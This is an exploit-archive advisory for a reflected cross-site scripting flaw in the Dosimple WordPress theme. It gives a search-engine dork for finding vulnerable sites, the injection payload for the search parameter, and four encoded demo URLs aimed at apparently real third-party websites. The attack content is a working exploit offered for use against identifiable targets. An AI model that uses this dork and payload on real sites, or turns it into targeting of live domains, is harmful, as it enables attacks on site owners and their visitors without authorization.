Wordpress theme Dosimple XSS Vulnerability

2015.08.25

Credit: R3NW4

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: \"Theme by domainagan.com.\"

# Exploit Title: [Wordpress theme Dosimple XSS Vulnerability]
# Google Dork: ["Theme by domainagan.com."]
# Date: [24-8-2015]
# Exploit Author: [R3NW4]
# Platform: (WebApps)
# Versions: [ 2 and lower ]
# Greetz: XSSposed.org - All Kurdish Hackers

-----------------------

Exploit:

site.com/?s='"><script>alert(%2FXSSPOSED%2F)<%2Fscript>

-------------------------

DemoZ:

http://gogoneXt.ye.vc/?s=%27%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E

http://www.ndaXnndung.club/?s=%27%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E

https://besthoXme-designideas.rhcloud.com/?s=%27%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E

http://madmXaxuryroad.tk/?s=%27%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E

------------------------

# https://twitter.com/R3NW4

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wordpress theme Dosimple XSS Vulnerability

Dork: \"Theme by domainagan.com.\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.